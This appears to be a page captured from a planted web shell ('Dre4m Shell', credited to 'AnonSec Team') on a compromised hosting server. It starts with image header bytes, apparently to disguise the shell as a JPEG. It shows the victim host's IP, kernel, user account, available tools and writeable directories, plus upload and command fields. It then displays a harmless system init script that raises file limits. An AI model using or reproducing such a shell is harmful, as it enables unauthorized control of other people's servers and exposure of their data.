ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 3.22.130.209
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /etc/rc0.d/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /etc/rc0.d/K91filelimits
#!/bin/sh
#
# filelimits       Increase filesystem limits
#
# chkconfig: 2345 11 91
# description: Increases max open file limits 
# probe: false

# Source function library.
if [ -f /etc/init.d/functions ]; then
  . /etc/init.d/functions
elif [ -f /etc/rc.d/init.d/functions ]; then
  . /etc/rc.d/init.d/functions
else
  echo "Could not find functions file, your system may be broken"
  exit 1
fi


# See how we were called.
case "$1" in
  start)
        if [ -e "/usr/local/cpanel/scripts/increase_filesystem_limits" ]; then
		    action "Increasing file system limits (v2)" /bin/true
            /usr/local/cpanel/scripts/increase_filesystem_limits
        else 
		    action "Increasing file system limits" /bin/true
            echo 131072 > /proc/sys/fs/file-max
		    if [ -e "/proc/sys/fs/dquot-max" ]; then
			    echo 16384 > /proc/sys/fs/dquot-max
		    fi
        fi    
        ;;
  stop)
        ;;
  restart)
	$0 stop
	$0 start
	;;
  reload)
	$0 restart
	;;
  *)
        echo "Usage: filelimits {start|stop|restart|reload}"
        exit 1
esac

exit 0


Anon7 - 2022
AnonSec Team